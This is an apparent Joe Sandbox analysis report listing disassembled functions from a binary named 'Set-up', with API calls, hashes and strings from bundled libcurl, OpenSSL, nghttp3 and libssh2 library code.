                                • Instruction ID: f49de55c26e92fee2d09684edb64e79d80ac13269e92212b9a58a94ecea416a8
                                • Opcode Fuzzy Hash: d806003e0e47dc8a3181bea54ede8c1f0eb328d308a18ef8dd979a80a48580ea
                                • Instruction Fuzzy Hash: 99D13DB6A157007BE7227A60AC03F2F769C9F91744F054928FD48A61C3F675EC248BA3
                                Function 001FC290 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 318COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 001FC60E
                                Strings
                                • Too small FXP_STATUS, xrefs: 001FC517
                                • feWould block waiting for status message, xrefs: 001FC4A6
                                • Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 001FC444
                                • Too small FXP_HANDLE, xrefs: 001FC582, 001FC675
                                • Unable to allocate new SFTP handle structure, xrefs: 001FC646
                                • Unable to send FXP_OPEN*, xrefs: 001FC45B
                                • Timeout waiting for status message, xrefs: 001FC4FB
                                • Response too small, xrefs: 001FC4E3
                                • Failed opening remote file, xrefs: 001FC531
                                • Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 001FC410
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
                                • API String ID: 3510742995-1499184223
                                • Opcode ID: 9a2da5d3c6b35ffcbbd3f3ee40e6f77f47dd0b89d6b54e86cb3a671ad9020f85
                                • Instruction ID: a21f41201fc8e4596b2eb2b26b62566ddacdd6502fc196b9a3655208726326f0
                                • Opcode Fuzzy Hash: 9a2da5d3c6b35ffcbbd3f3ee40e6f77f47dd0b89d6b54e86cb3a671ad9020f85
                                • Instruction Fuzzy Hash: 31B148B09047499BDB14CF28DD41B7BB7E4FF95318F044A2CFA4692292E770D918CB92
                                Function 0015E270 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 303stringCOMMON
                                Download Yara Rule
                                APIs
                                • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,0015CC57), ref: 0015F028
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strrchr
                                • String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
                                • API String ID: 3418686817-2910492138
                                • Opcode ID: 92b648c69cafb70f0dbb7befd966801fbf97c9131fd1e33bd444a5734a870631
                                • Instruction ID: 72da94a99e3628eea8500b2fb991cfa0824a8f053747b188a717e3a03b9eb220
                                • Opcode Fuzzy Hash: 92b648c69cafb70f0dbb7befd966801fbf97c9131fd1e33bd444a5734a870631
                                • Instruction Fuzzy Hash: C6A13471B00314EBE7249A24DC45B777ADAEB9130AF08407DED688F283D766DE4AC790
                                Function 001BA8E0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 001BA9E8
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,001B71B7,00000001,?,?), ref: 001BAA04
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,001B71B7,00000001,?,?), ref: 001BAA19
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,001B71B7,00000001,?,?), ref: 001BAA2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert$memcpy
                                • String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
                                • API String ID: 3718630003-2514804127
                                • Opcode ID: 0ca0d3ccc94eac73b7898a4453380d9ca3e3bb6686543d19f5fbab9de70d6aa6
                                • Instruction ID: c32f9ac669152f8b7675e58003676e4802cede3b0d065dd0dbb7d33776b1f219
                                • Opcode Fuzzy Hash: 0ca0d3ccc94eac73b7898a4453380d9ca3e3bb6686543d19f5fbab9de70d6aa6
                                • Instruction Fuzzy Hash: AE41CD71104308EFDB00DF15CC80F9ABBA5FF4834CF4605A8E4888B2A2D732E849CB52
                                Function 00352370 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 0035238F
                                • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 003523C4
                                • GetLastError.KERNEL32 ref: 00352433
                                  • Part of subcall function 00352240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0034F763,?,?,?,?,?), ref: 00352251
                                  • Part of subcall function 00352240: WideCharToMultiByte.KERNEL32 ref: 00352284
                                  • Part of subcall function 00352240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 003522BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
                                • String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
                                • API String ID: 3049598375-4146664032
                                • Opcode ID: 54e8a70bd6e4f2041a706d5466d8b88f0cf56a9d5ace251da075c95fcd82c619
                                • Instruction ID: 54e5c61380d03a00fd98ebd052c4b5b365d2bf0da1a0300f1e7a055cd79050e8
                                • Opcode Fuzzy Hash: 54e8a70bd6e4f2041a706d5466d8b88f0cf56a9d5ace251da075c95fcd82c619
                                • Instruction Fuzzy Hash: 3C212BA57503007BEA1137A5BC07F3B36189792B46F044534FE08791D3E6D959284EA3
                                Function 002F4960 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 381COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 002F49A8
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 002F4D44
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?), ref: 002F4E33
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy$strcpystrlen
                                • String ID: No password method specified$Prompt info data type incorrect$crypto/passphrase.c$do_ui_passphrase$info$ossl_pw_get_passphrase$pass phrase
                                • API String ID: 699153967-1272933286
                                • Opcode ID: 91661eb5856a7b91676a764a2cae7a1a28b5df26f8692efd1d516fb484e244bc
                                • Instruction ID: 46ce36f2f84e697f30b4cb9c85d35ae4fd61c1ff4e4769ef62b2744e56b00675
                                • Opcode Fuzzy Hash: 91661eb5856a7b91676a764a2cae7a1a28b5df26f8692efd1d516fb484e244bc
                                • Instruction Fuzzy Hash: 48C1E4B5B643057BD620BE60DC43F3BB6A4AB50B44F14493CFE89562C3E6F5E8348A52
                                Function 001748F0 Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 349COMMON
                                Download Yara Rule
                                APIs
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0017491A
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0017497C
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 001749F1
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00174ABB
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00174B21
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00174BCF
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00174C33
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00174CDD
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00174D30
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memchr
                                • String ID: 0123456789
                                • API String ID: 3297308162-2793719750
                                • Opcode ID: 35470b523cb64f882907860cf398b55532cbbaf576214e2b28c9c85c30cdf356
                                • Instruction ID: dc26d6b69e0762d7a73ee2afda2fd07d17b4117db31b4ae37568c270251008c3
                                • Opcode Fuzzy Hash: 35470b523cb64f882907860cf398b55532cbbaf576214e2b28c9c85c30cdf356
                                • Instruction Fuzzy Hash: 32B164212883955BDB268E2488A07767BE58F96788F0DC07DEED98B3C3D7258D09D351
                                Function 0027A1B0 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 174stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 002EB4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB4CA
                                  • Part of subcall function 002EB4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB4D4
                                  • Part of subcall function 002EB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,002F7667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB53B
                                  • Part of subcall function 002EB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,002F7667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB5A1
                                  • Part of subcall function 002EB4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB5B4
                                  • Part of subcall function 002EB4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB648
                                  • Part of subcall function 002EB4B0: WideCharToMultiByte.KERNEL32 ref: 002EB67F
                                  • Part of subcall function 002EB4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(002F7667,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB504
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0027A1F0
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0027A20B
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 0027A25D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
                                • String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
                                • API String ID: 2744062652-2540125403
                                • Opcode ID: d8495af7c755b035fe9fd926d7bf6e17017068e8d46fc509179809444e3b56c4
                                • Instruction ID: e2b6cc671f4756eed03ac5c2fbd2e5365eef5d0bc385440a876c00d3a0b048fc
                                • Opcode Fuzzy Hash: d8495af7c755b035fe9fd926d7bf6e17017068e8d46fc509179809444e3b56c4
                                • Instruction Fuzzy Hash: 365118E1A183556FEB106E259C42B2F76D89FD0319F088478FC8D86243FB79ED20C652
                                Function 001327E0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 299stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0013284C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen
                                • String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
                                • API String ID: 39653677-4104037097
                                • Opcode ID: 9b98c3520768c9bb65cd849a8001601c71f9f9b1bc597fc1cfb81db2f2366e11
                                • Instruction ID: 3c560e1a8e9a5d37bc2971a340f9fb3dbdbc77afc25d8f0ad521ff600527c97f
                                • Opcode Fuzzy Hash: 9b98c3520768c9bb65cd849a8001601c71f9f9b1bc597fc1cfb81db2f2366e11
                                • Instruction Fuzzy Hash: 80A14370604340AFDB38AE18D845B7A7BD6AF95318F19847DFC898B2D2E7369C41C392
                                Function 0014A260 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 160networkCOMMON
                                Download Yara Rule
                                APIs
                                • getpeername.WS2_32(?,?,00000080), ref: 0014A376
                                • WSAGetLastError.WS2_32 ref: 0014A380
                                  • Part of subcall function 001178B0: closesocket.WS2_32(?), ref: 001178BB
                                  • Part of subcall function 0014EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 0014EF6F
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A3D2
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A3D6
                                Strings
                                • ssrem inet_ntop() failed with errno %d: %s, xrefs: 0014A3F4
                                • accepted_set(sock=%d, remote=%s port=%d), xrefs: 0014A488
                                • getpeername() failed with errno %d: %s, xrefs: 0014A3A0
                                • cf-socket.c, xrefs: 0014A2E9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno$ErrorLastclosesocketgetpeername
                                • String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                • API String ID: 1501154218-2965463112
                                • Opcode ID: eca15a8d94dac7aa3b57ec7db467fad0af96c84cdc73d6829d7f6dccda37d943
                                • Instruction ID: 5c2b7c157b446b2867aff6a641b0755e568460d82327e0cd82686090508fb5e4
                                • Opcode Fuzzy Hash: eca15a8d94dac7aa3b57ec7db467fad0af96c84cdc73d6829d7f6dccda37d943
                                • Instruction Fuzzy Hash: 51512831944340ABE721DF24DC42FE777B4EF91318F044518F99C5B262EB72A999CB92
                                Function 001BA5A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 001BA5FC
                                • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 001BA698
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 001BA6BF
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 001BA6EB
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 001BA700
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
